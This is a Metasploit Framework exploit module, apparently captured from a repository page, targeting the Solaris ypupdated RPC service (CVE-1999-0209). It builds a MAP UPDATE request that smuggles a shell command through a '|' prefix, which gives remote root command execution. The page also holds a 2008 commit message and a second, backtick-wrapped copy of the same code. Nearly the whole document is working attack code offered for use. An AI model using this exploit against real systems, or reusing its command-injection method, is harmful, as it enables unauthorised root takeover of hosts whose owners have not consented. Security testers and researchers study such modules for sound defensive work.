metasploit-framework/modules/exploits/solaris/sunrpc/ypupdated_exec.rb


require 'msf/core'

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote

	include Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris ypupdated Command Execution',
			'Description'    => %q{
				This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request.  Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format '|<command>'.

				Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
				ypupdated is started with the '-i' command-line option.
			},
			'Author'         => [ 'I)ruid <druid@caughq.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					['BID', '1749'],
					['CVE', '1999-0209'],
					['OSVDB', '11517'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		hostname  = datastore['HOSTNAME']
		program   = 100028
		progver   = 1
		procedure = 1

		print_status 'Sending PortMap request for ypupdated program'
		pport = sunrpc_create('udp', program, progver)

		print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
		print_status 'Waiting for response...'
		sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
		command = '|' + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)

		sunrpc_destroy

		print_good 'No Errors, appears to have succeeded!'
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		print_status 'Warning: ' + $!
		print_status 'Exploit may or may not have succeeded.'
	end

end
end
Adding I)ruids's yp exploit. Fixing a streamserver bug thats been causing problems for a while. Updating the HTTP capture module to do better fingerprinting git-svn-id: file:///home/svn/framework3/trunk@5477 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-18 01:33:09 +00:00
			`require 'msf/core'`

			`module Msf`

			`class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote`

			`include Exploit::Remote::SunRPC`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Solaris ypupdated Command Execution',`
			`'Description' => %q{`
			`This exploit targets a weakness in the way the ypupdated RPC`
			`application uses the command shell when handling a MAP UPDATE`
			`request. Extra commands may be launched through this command`
			`shell, which runs as root on the remote host, by passing`
			`commands in the format '\|<command>'.`

			`Vulnerable systems include Solaris 2.7, 8, 9, and 10, when`
			`ypupdated is started with the '-i' command-line option.`
			`},`
			`'Author' => [ 'I)ruid <druid@caughq.org>' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 4498 $',`
			`'References' =>`
			`[`
			`['BID', '1749'],`
			`['CVE', '1999-0209'],`
			`['OSVDB', '11517'],`
			`],`
			`'Privileged' => true,`
			`'Platform' => ['unix', 'solaris'],`
			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
			`},`
			`'Targets' => [ ['Automatic', { }], ],`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),`
			`OptInt.new('GID', [false, 'GID to emulate', 0]),`
			`OptInt.new('UID', [false, 'UID to emulate', 0])`
			`], self.class`
			`)`
			`end`

			`def exploit`
			`hostname = datastore['HOSTNAME']`
			`program = 100028`
			`progver = 1`
			`procedure = 1`

			`print_status 'Sending PortMap request for ypupdated program'`
			`pport = sunrpc_create('udp', program, progver)`

			`print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"`
			`print_status 'Waiting for response...'`
			`sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])`
			`command = '\|' + payload.encoded`
			`msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)`
			`sunrpc_call(procedure, msg)`

			`sunrpc_destroy`

			`print_good 'No Errors, appears to have succeeded!'`
			`rescue ::Rex::Proto::SunRPC::RPCTimeout`
			`print_status 'Warning: ' + $!`
			`print_status 'Exploit may or may not have succeeded.'`
			`end`

			`end`
			`end`